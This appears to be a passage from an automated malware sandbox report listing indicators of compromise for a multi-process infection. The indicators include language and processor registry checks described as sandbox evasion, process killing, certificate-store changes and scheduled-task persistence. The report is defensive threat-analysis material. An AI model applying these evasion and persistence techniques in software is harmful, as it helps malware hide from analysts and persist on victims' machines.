pid pid_target Process procid_target 624 1248 WerFault.exe 32 2420 2312 WerFault.exe 35 2568 880 WerFault.exe 39 316 1532 WerFault.exe 38 1892 1940 WerFault.exe 65 2568 2120 WerFault.exe 68 292 2648 WerFault.exe 79 2232 700 WerFault.exe 85 1580 2676 WerFault.exe 89 3388 3748 WerFault.exe 145 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c5845c87f3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2266dcdb00.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bovjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage eaa92bd248.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a871065581.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4c71e9f822.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eaa92bd248.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 50f96f9f6a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1ba79af20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b463df2a29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language eaa92bd248.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gmsbuho.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 57eec1646c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3e5895c6d6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4536f7f1c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f4c900399.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m5UP2Yj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 2266dcdb00.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dd0f37a968.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8f4c900399.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8f4c900399.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 684 timeout.exe 2312 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 10 IoCs
pid Process 2740 taskkill.exe 640 taskkill.exe 2640 taskkill.exe 2060 taskkill.exe 2460 taskkill.exe 820 taskkill.exe 1544 taskkill.exe 1844 taskkill.exe 3960 taskkill.exe 2612 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 10 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 3b959cc017.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 57eec1646c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 qFqSpAp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e qFqSpAp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Ta3ZyUR.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 3b959cc017.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 57eec1646c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e qFqSpAp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Ta3ZyUR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 3b959cc017.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3032 schtasks.exe 1244 schtasks.exe 2996 schtasks.exe -
